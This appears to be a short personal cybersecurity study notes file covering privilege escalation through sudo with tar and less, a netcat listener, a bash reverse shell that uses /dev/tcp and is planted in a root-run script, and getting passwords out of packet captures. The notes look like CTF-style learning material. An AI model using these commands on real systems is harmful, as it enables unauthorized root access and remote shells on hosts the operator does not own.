FKouhai/cybersecNotes/basicNotes.md

 If the user is allowed in the sudoers file we can easily become root by running _sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh_

+#Using and understanding netcat

+to set up a listening port in nc

+nc -lnvp portnumber

+#Read pcaps

+Could use wireshark

+If you are looking for a password strings will just do the job for it and it will provide more clarity

+#Bash remote shell

+echo 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"' > /path/to/script run by root

+#Privesc with less
+you can run less with _sudo_ against a file and enter in less's command mode by typing !/bin/sh

+Example

+sudo less file.log
+!/bin/sh